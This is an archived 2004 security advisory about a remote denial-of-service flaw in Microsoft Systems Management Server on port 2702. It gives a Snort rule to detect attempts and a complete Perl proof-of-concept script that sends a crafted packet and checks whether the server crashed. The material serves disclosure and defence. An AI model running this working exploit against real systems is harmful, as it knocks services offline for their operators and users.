Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows :: hack0099.htm

MS SMS DOS PoC code and Snort sig



MS SMS DOS Proof-of-concept code and Snort sig





#####################################################################



Advisory Name : Microsoft Systems Management Server Remote Denial Of Service Vulnerability

Release Date : 22 July, 2004

Application : Microsoft Systems Management Server (SMS)

Author : MacDefender / SRR Project Group of Ready Response (srr@readyresponse.org) 



#####################################################################



Overview



In response to a remote denial of service vulnerability in the Microsoft Systems Management Server:



http://www.securityfocus.com/bid/10726 

http://www.net-security.org/vuln.php?id=3576 



We have developed a snort signature to detect attempted DOS attacks to the SMS port 2702 port on a server.



In addition we have also released perl code that will demonstrate the vulnerability against a live server, so administrators will be able to test the security of their own Systems Management Server's.





------------------------------------------------



Signature



The snort (www.snort.org) signature we have developed for identifying an attempted DOS attack to a Systems Management Server is as follows:



alert tcp any 1024: -> any 2702 (msg: "MS SMS DOS"; content: "|52 43 48 30|";depth: 4;isdataat: 139; classtype: denial-of-service;)





------------------------------------------------



Proof of concept code



You may test your own Systems Management Server's for vulnerability to this issue by using the following perl code:





#!/usr/bin/perl



#############################

#

# SMS DOS proof of concept and test code

#

#############################



use Socket;

use IO::Socket;



if (@ARGV != 1)

{

	print "usage: $0 \n";

	exit;

}



$host = shift(@ARGV);



$hexmsg = converthex("5243483016004000524348455858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858");



print "\nCreating socket for connection to: $host\n\n";



my $sock1 = IO::Socket::INET->new (PeerAddr => $host, PeerPort => "(2702)", Proto => "tcp") or die("Could not create socket: $!\n");



$sock1->autoflush(1);



print $sock1 "$hexmsg";



while (<$sock1>)

{

	print;

}



print "\nPacket sent to $host (please wait) ...\n";



sleep(2);



print "Verifying status of $host ...\n";



sleep(2);



my $sock2 = IO::Socket::INET->new (PeerAddr => $host, PeerPort => '(2702)', Proto => 'tcp') or die("\nDOS was successful - $host is down ...\n");



print "\nAttempt was not successful. $host is still alive and responding ...\n";



close($sock1);

close($sock2);



#############################

# End main code, start subs

#############################



sub converthex

{

	local ($l) = @_;

	$l =~ s/([0-9a-f]{1,2})\s*/sprintf("%c",hex($1))/egi;



	return $l;

}



#############################

# End code

#############################





------------------------------------------------



Credit



Credit for the development of the snort signature and proof of concept code is credited to MacDefender / SRR project group of Ready Response (http://www.readyresponse.org / srr@readyresponse.org) 





TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH